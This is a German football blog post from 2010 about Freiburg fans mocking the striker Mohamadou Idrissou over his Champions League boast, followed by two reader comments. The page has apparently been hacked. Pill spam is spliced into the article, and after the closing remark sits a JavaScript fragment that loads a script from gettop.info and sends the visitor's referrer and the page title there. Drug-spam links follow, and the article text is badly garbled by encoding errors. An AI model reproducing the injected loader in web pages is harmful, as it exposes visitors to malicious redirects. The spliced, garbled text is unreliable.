Willkommen auf » Idrissou spielt Champions League
23. Dez 2010

Idrissou spielt Champions League

Lustige Szene vom 16. Spieltag der laufenden Bundesliga-Saison.

Der Freiburger Fanblock sendet einen netten augenzwinkernden GruAY an den Gladbacher StA?rmer Mohamadou Idrissou, der seien TAi??ppen bis zum Sommer noch fA?r die Breisgauer schnA?rte und in die Ligageschichte eher durch mAi??AYige Leistungen (bisher 118 Erstligaspiele, 23 Tore) bei gleichzeitig maAYlosen AnsprA?chen eingehen wird. In der vergangenen Saison soll er seinen Abgang mit Cheap Cheap Cheap Pills folgender Aussage provoziert haben Pills : „Ich habe eh keine Lust mehr, mit euch Absteigern zu spielen. Ich spiele nAi??chstes Jahr in der Champions League“.

Zur Winterpause belegt nun allerdings der SC Freiburg einen A?berragenden sechsten Rang und schnuppert an den internationalen PlAi??tzen. Idrissou trAi??gt mit der Borussia aus MAi??nchengladbach als enttAi??uschendes Bundesligaschlusslicht die Rote Laterne.

Doch die individuellen AnsprA?che sind natA?rlich geblieben… Idrissou spielt Champions League…

„Idrissou spielt Champions-League auf PS3, die ganze Nacht, von zwAi??lf bis acht.“
Tolle Aktion :Ds.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “; http://acnj-blog.com/2018/02/02/purchase-kemadrin-wikipedia/ cyproheptadine no prescription http://gamberra.es/aristocort-online-shoes/ http://www.kessiedulthummon.com/2018/02/02/malegra-over-the-counter/


2 Kommentare



  1. geil! 😀 tja, das hätte sich idrissou sicher anders vorgestellt. wobei champions league mit gladbach auch etwas unrealistisch ist! ^^



  2. Ich sags ja, der Junge überschätzt sich und sein Potenzial einfach maßlos (wie leider so viele im Bundesligageschäft).
    Kamerunischer Nationalspieler ist er, geschenkt, aber sonst…
    2000-2001 FSV Frankfurt
    2001–2002 SV Wehen Wiesbaden
    2002–2006 Hannover 96
    2005 → SM Caen (Leihe)
    2006–2008 MSV Duisburg
    2008–2010 SC Freiburg
    2010– Borussia Mönchengladbach

Einen Kommentar schreiben